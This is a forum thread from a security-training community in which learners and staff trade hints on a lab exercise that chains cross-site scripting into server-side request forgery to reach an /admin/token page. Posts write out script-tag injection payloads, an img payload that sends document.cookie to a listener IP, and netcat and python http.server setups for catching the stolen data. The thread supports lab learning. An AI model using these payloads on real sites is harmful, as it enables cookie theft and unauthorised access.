Forum Discussion

shubham's avatar
shubham
Icon for Bronze I rankBronze I
2 months ago

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT.

Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

  • These replies have been moved.
  • TillyCorless's avatar
    TillyCorless
    Icon for Community Manager rankCommunity Manager

    Hey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution βœ…

    Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

  • I have done the following so far:

    1. Identify the wildcard cycles employee user ID & token
    2. Host the http server using the python module (port 8080)
    3. Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token} - 
    4. All the while having the nc -vnlp 5555 looping in an infinite while loop

    On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page... 

    I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up... 

    Been stuck on this for way longer than I care to, any guidance would be greatly appreciated. 

    • CyberSharpe's avatar
      CyberSharpe
      Icon for Bronze III rankBronze III

      johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in. 

      • johndoe321's avatar
        johndoe321
        Icon for Bronze I rankBronze I

        Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit... 

  • They key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts.  Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters.  The other displays the token in the html body.  The example code snippets work with VERY minor modifications.  One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.

    • CyberSharpe's avatar
      CyberSharpe
      Icon for Bronze III rankBronze III

      Agreed.

      Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available. 
      The actual script doesn’t need much work. 

  • Hi me5382 natelott πŸ‘‹

    In both of your payloads, you're using 0.0.0.0 as the IP address. This would work if the Wildcard Cycles application was running locally on the Kali Desktop. However, as this is running on a different host, you'll need to specify the Kali IP address, not 0.0.0.0.

    • natelott's avatar
      natelott
      Icon for Bronze I rankBronze I

      NyePriorThanks for the reply.  I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result.  If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url?  The JS is executing when I expose the vulnerability and I can see the request happen in netcat...  Therefore I feel confident that the issue is inside the js file or with the /admin/token itself.  I have tried the python method and the netcat method.   The /admin/token endpoint gets me a 302 permanent redirect.  As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.

  • Having the same issues.  Script is running, but /admin/token immediately redirects back to /dashboard.  Executed JS code in console and it returns html from /dashboard.  

    Created script.js on VM.  Running netcat instance on port 8080 to handle HTTP request.   I can see the request occur in terminal.   Token not returned.  

    Command being used in message field:  <script src="http://0.0.0.0:8080/script.js"></script>

  • I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code

    I tried running the hint from below as well as the following:

    <script src="http://0.0.0.0:8080/script.js"></script>

    My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).

    I am sure I must be misunderstanding something, any help would be appreciated. 



  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager

    Hi shubham did the information above help?

    If so, please don't forget to mark it as a Solution βœ…

    Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

  • ChrisKershaw's avatar
    ChrisKershaw
    Icon for Community Support rankCommunity Support

    Hey shubham

    Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊. 

    I'll be happy to share a hint to help you with your lab attempt:

    In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

    Will you see if this helps you with your attempt? 


  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager

    Hi shubham welcome to The Human Connection!

    Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?

    • shubham's avatar
      shubham
      Icon for Bronze I rankBronze I

      Thanks for welcome.

      So I tire using netcat with the payload in message to make a reverse connection

      Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>

      • NyePrior's avatar
        NyePrior
        Icon for Immerser rankImmerser

        Hi shubham πŸ‘‹ have another look at the "XSS and SSRF" section of the Briefing panel. You'll need to use a different payload than this.